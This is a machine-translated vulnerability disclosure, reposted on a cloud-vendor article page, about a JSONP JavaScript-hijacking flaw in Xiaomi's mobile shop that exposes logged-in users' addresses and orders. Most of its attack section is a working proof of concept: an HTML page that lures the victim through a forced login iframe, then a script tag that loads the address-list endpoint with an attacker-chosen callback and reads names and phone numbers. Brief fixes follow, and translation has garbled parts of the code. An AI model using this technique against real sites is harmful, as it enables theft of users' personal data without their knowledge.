Home > Cloud Computing > Cloud Security

Xiaomi js hijacking can obtain user addresses and order information (mobile phone communication API mining skills)

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

The method for obtaining data in an application is jsonp, and callback can be obtained naturally.

The mobile phone client of Xiaomi mall is actually a built-in browser loaded m.xiaomi.com, and the user's address, order and other data exist in app.shopapi.xiaomi.com. It is estimated that the jsonp method is used for cross-origin, as a result, JavaScript hijacking can be used to obtain user data.

Test process:

1. Enable Burp and proxy

2. Set up an Internet proxy on the mobile phone, view the http request, and then see a series of callback requests.

3. in step 2, only m.xiaomi.com can be hijacked by js. What can I do with www.xiaomi.com and other domain names?

4. Was m.xiaomi.com found that the login interface used is https://account.xiaomi.com/pass/serviceLogin? Callback =... & sid = eshopmobile, the focus is eshopmobile (eshopmobile will log on to app.shopapi.xiaomi.com synchronously), while eshop

5. Through 4 analysis, in the case of user login to lure the user to access a https://account.xiaomi.com/pass/serviceLogin? Callback =... & sid = eshopmobile. The main domain name and other domain names can also be hijacked by js.

6. script for hijacking the user address list:

Xiaomi.html


<Iframe src = "https://account.xiaomi.com/pass/serviceLogin? Signature % 2523ac % 253 Daccount % 2526op % 253 Dindex % 26 sign % signature % 2C % 2C & sid = esw.mobile "> </iframe> <! -- The sign in it is used for verification. Each login is different and does not affect hijacking. -->
<Script>
SetTimeout (function () {location.href='xiaomi2.html ';}, 3000 );
</Script>

Xiaomi2.html


<Script>
Function getall (o ){
Var data = o. data;
Alert (data [0]. consignee + ''+ data [0]. tel );
}
</Script>
<Script src = "http://app.shopapi.xiaomi.com/v1/address/list? Callback = getall & client_id = 180100031013 & _ = 1367750497612 "> </script>
 




 


Solution:

1. It can be returned in pure json. The p3p method in the header of the header is cross-origin.

2. If jsonp is required, Judge Referer + UserAgent ~

 

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
communication skills books communication skills for dummies t mobile information phone number t mobile information phone number books to help with communication skills best books to learn communication skills can mobile phone tracked switched off
Related Article
Cloud security to achieve effective prevention of the future ...
Focus on three major cloud security areas, you know?
Decrypting Cisco type 5 password hashes
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More